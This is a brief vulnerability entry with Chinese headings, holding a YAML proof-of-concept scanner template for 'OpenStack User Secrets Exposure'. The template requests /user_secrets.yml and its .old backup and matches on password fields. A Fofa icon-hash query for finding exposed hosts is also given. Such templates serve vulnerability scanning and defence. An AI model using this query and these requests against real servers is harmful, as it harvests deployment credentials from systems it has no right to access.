漏洞描述
Fofa: icon_hash="786533217"
openstack-user-secrets: OpenStack User Secrets Exposure
PoC代码[已公开]
id: openstack-user-secrets
info:
name: OpenStack User Secrets Exposure
author: geeknik
severity: high
verified: false
description: |-
Fofa: icon_hash="786533217"
reference:
- https://docs.openstack.org/project-deploy-guide/openstack-ansible/stein/configure.html
tags: openstack,config,exposure,files
created: 2023/11/30
rules:
r0:
request:
method: GET
path: /user_secrets.yml
expression: |
response.status == 200 &&
response.body.bcontains(b'_password:') &&
response.body.bcontains(b'OpenStack environment')
r1:
request:
method: GET
path: /user_secrets.yml.old
expression: |
response.status == 200 &&
response.body.bcontains(b'_password:') &&
response.body.bcontains(b'OpenStack environment')
expression: r0() || r1()